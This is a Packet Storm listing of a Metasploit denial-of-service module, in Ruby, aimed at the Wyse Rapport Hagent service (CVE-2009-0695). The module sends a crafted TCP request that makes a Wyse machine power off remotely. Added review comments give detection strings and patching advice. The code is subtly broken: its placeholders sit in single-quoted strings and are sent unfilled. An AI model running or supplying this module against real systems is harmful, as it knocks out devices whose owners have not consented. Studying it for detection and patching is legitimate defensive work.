packetstormIt.soluniumPACKETSTORM:113683
HistoryJun 14, 2012 - 12:00 a.m.

Wyse Machine Remote Power Off Denial Of Service

2012-06-1400:00:00
it.solunium
packetstormsecurity.com
25

0.741 High

EPSS

Percentile

98.1%

`require 'msf/core'  
  
# Metasploit auxiliary DoS module aimed at the Wyse Rapport Hagent service
# (CVE-2009-0695 according to the References below). `run` opens one TCP
# connection to RHOST:RPORT, sends a single request string, reads one reply
# and reports success only when that reply is exactly '&00'.
#
# Defensive notes:
# - The request always begins with the literal '&V52&CI=3|', and per this code
#   a device that accepted it answers '&00'. Both strings can serve as
#   network-detection anchors on the agent port (RPORT defaults to 80 here).
# - The vendor bulletin WSB09-01 linked in References is the place to confirm
#   affected versions and the fix. Until patched, the agent port should not be
#   reachable from untrusted networks.
class Metasploit3 < Msf::Auxiliary  
# NOTE(review): ExcellentRanking is normally reserved for modules that never
# take the target service down; confirm it is appropriate for a power-off DoS.
Rank = ExcellentRanking  
  
# Tcp supplies connect/disconnect/sock and the RHOST/RPORT options;
# Dos marks the module as a denial-of-service auxiliary.
include Msf::Exploit::Remote::Tcp  
include Msf::Auxiliary::Dos  
  
# Registers the module metadata and the default target port.
#
# info - optional Hash merged into the metadata through update_info.
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Wyse Machine Remote Power off (DOS)',  
'Description' => %q{  
This module exploits the Wyse Rapport Hagent service and cause  
remote power cycle (Power off the wyse machine remotely).  
},  
'Stance' => Msf::Exploit::Stance::Aggressive,  
'Author' => '[email protected]',  
'Version' => '$Revision: 14976 $',  
# Advisory identifiers and vendor bulletin for the underlying issue.
'References' =>  
[  
['CVE', '2009-0695'],  
['OSVDB', '55839'],  
['US-CERT-VU', '654545'],  
['URL', 'http://snosoft.blogspot.com/'],  
['URL', 'http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/'],  
['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'],  
['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'],  
],  
# NOTE(review): 'Privileged', 'DefaultOptions' (EXITFUNC), 'Targets' and
# 'DefaultTarget' are not read anywhere in run below; they look carried over
# from an exploit-module template.
'Privileged' => true,  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},  
'Targets' =>  
[  
[ 'Wyse Linux x86', {'Platform' => 'linux',}],  
],  
'DefaultTarget' => 0,  
# NOTE(review): the CVE id is from 2009, so this date looks like the module's
# publication date rather than the vulnerability disclosure date; confirm.
'DisclosureDate' => 'Jun 13 2012'  
))  
  
# Default the target port to 80; the operator can override RPORT.
register_options(  
[  
Opt::RPORT(80),  
], self.class)  
end  
  
  
# Sends one request to the agent and reports the outcome on the console.
#
# Returns nothing useful. Connection failures are caught by the rescue
# clauses at the end of the method and only reported as status lines.
def run  
  
  
# Connect to the target service  
print_status("Connecting to the target #{rhost}:#{rport}")  
# A failed connect raises rather than returning false, so control only gets
# past this point on success (see the rescue clauses below).
if connect  
print_status("Connected...")  
end  
  
# Parameters  
  
# "00" followed by the hex encoding of 5 random characters (12 hex digits).
genmac = "00"+Rex::Text.rand_text(5).unpack("H*")[0]  
  
# Assemble the request from the literal fragments below.
craft_req = '&V52&CI=3|'  
craft_req << 'MAC=#{genmac}|#{rhost}|'  
craft_req << 'RB=0|MT=3|'  
craft_req << '|HS=#{rhost}|PO=#{rport}|'  
craft_req << 'SPO=0|'  
  
# Send the malicious request  
sock.put(craft_req)  
  
# Read a single reply; the arguments presumably mean "whatever is available,
# waiting up to 10 seconds" - confirm against the Rex socket API.
resp = sock.get_once(-1, 10)  
# Printed before the nil check, so a missing reply shows as "Received: ".
print_status("Received: #{resp}")  
  
# NOTE(review): disconnect is not in an ensure block, so an exception raised
# by put/get_once above skips it.
disconnect  
  
# No reply at all: report and stop.
if not resp  
print_error("No reply from the target, this may not be a vulnerable system")  
return  
end  
  
# Exact string match: only a reply of precisely '&00' counts as success. Any
# other non-empty reply falls through without a further message.
if resp == '&00'  
print_status("#{rhost} execute command succefuly & power off.")  
return  
end  
  
# Exceptions: connection-level failures are reported with print_status
# (not print_error) and are not re-raised.
rescue ::Rex::ConnectionRefused  
print_status("Couldn't connect to #{rhost}:#{rport} | Connection refused.")  
rescue ::Rex::HostUnreachable  
print_status("Couldn't connect to #{rhost}:#{rport} | Host unreachable")  
rescue ::Rex::ConnectionTimeout  
print_status("Couldn't connect to #{rhost}:#{rport} | Connection time out")  
rescue ::Errno::ECONNRESET, ::Timeout::Error  
print_status("#{rhost} not responding.")  
  
end  
end  
  
  
  
`
